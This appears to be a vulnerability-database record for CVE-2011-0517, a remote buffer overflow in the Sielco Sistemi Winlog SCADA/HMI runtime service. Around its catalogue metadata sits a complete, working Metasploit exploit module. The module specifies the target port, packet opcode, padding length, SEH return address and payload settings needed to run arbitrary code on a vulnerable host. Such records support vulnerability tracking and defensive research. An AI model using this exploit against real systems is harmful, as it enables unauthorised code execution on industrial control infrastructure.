ID

VAR-E-201101-0440


CVE

cve_id:CVE-2011-0517

Trust: 2.4

sources: BID: 45813 // PACKETSTORM: 102516 // EXPLOIT-DB: 17430 // EDBNET: 40020

EDB ID

17430


TITLE

Sielco Sistemi Winlog - Remote Buffer Overflow (Metasploit) - Windows remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 17430

DESCRIPTION

Sielco Sistemi Winlog - Remote Buffer Overflow (Metasploit). CVE-2011-0517CVE-70418 . remote exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 17430

AFFECTED PRODUCTS

vendor:sielcomodel:sistemi winlogscope: - version: -

Trust: 1.5

vendor:sielcomodel:sistemi winlog proscope:eqversion:2.7

Trust: 0.3

vendor:sielcomodel:sistemi winlog proscope:neversion:2.7.1

Trust: 0.3

sources: BID: 45813 // PACKETSTORM: 102516 // EXPLOIT-DB: 17430

EXPLOIT

##
# $Id: winlog_runtime.rb 13000 2011-06-21 22:42:53Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh

def initialize(info = {})
super(update_info(info,
'Name' => 'Sielco Sistemi Winlog Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Sielco
Sistem Winlog <= 2.07.00. When sending a specially formatted
packet to the Runtime.exe service, an attacker may be able to
execute arbitrary code.
},
'Author' => [ 'Luigi Auriemma', 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 13000 $',
'References' =>
[
[ 'CVE', '2011-0517' ],
[ 'OSVDB', '70418'],
[ 'URL', 'http://aluigi.org/adv/winlog_1-adv.txt' ],
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 450,
'BadChars' => "\x00\x20\x0a\x0d",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Winlog Lite 2.07.00', { 'Ret' => 0x011946de } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 13 2011'))

register_options([Opt::RPORT(46823)], self.class)
end

def exploit

connect

data = [0x02].pack('C') # opcode
data << [0x0101].pack('n')
data << rand_text_alpha_upper(588)
data << generate_seh_payload(target.ret)

print_status("Trying target #{target.name}...")
sock.put(data)

handler
disconnect

end

end

Trust: 1.0

sources: EXPLOIT-DB: 17430

EXPLOIT LANGUAGE

rb

Trust: 0.6

sources: EXPLOIT-DB: 17430

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 17430

TYPE

Remote Buffer Overflow (Metasploit)

Trust: 1.0

sources: EXPLOIT-DB: 17430

TAGS

tag:Metasploit Framework (MSF)

Trust: 1.0

tag:exploit

Trust: 0.5

tag:overflow

Trust: 0.5

tag:arbitrary

Trust: 0.5

sources: PACKETSTORM: 102516 // EXPLOIT-DB: 17430

CREDITS

Metasploit

Trust: 0.6

sources: EXPLOIT-DB: 17430

EXTERNAL IDS

db:NVDid:CVE-2011-0517

Trust: 2.4

db:EXPLOIT-DBid:17430

Trust: 1.6

db:EDBNETid:40020

Trust: 0.6

db:PACKETSTORMid:102516

Trust: 0.5

db:BIDid:45813

Trust: 0.3

sources: BID: 45813 // PACKETSTORM: 102516 // EXPLOIT-DB: 17430 // EDBNET: 40020

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2011-0517

Trust: 2.1

url:https://www.exploit-db.com/exploits/17430/

Trust: 0.6

url:http://www.sielcosistemi.com/en/products/winlog_scada_hmi/

Trust: 0.3

url:http://aluigi.altervista.org/adv/winlog_1-adv.txt

Trust: 0.3

sources: BID: 45813 // PACKETSTORM: 102516 // EXPLOIT-DB: 17430 // EDBNET: 40020

SOURCES

db:BIDid:45813
db:PACKETSTORMid:102516
db:EXPLOIT-DBid:17430
db:EDBNETid:40020

LAST UPDATE DATE

2022-07-27T09:33:16.024000+00:00


SOURCES UPDATE DATE

db:BIDid:45813date:2015-03-19T09:45:00

SOURCES RELEASE DATE

db:BIDid:45813date:2011-01-14T00:00:00
db:PACKETSTORMid:102516date:2011-06-23T06:27:04
db:EXPLOIT-DBid:17430date:2011-06-21T00:00:00
db:EDBNETid:40020date:2011-06-21T00:00:00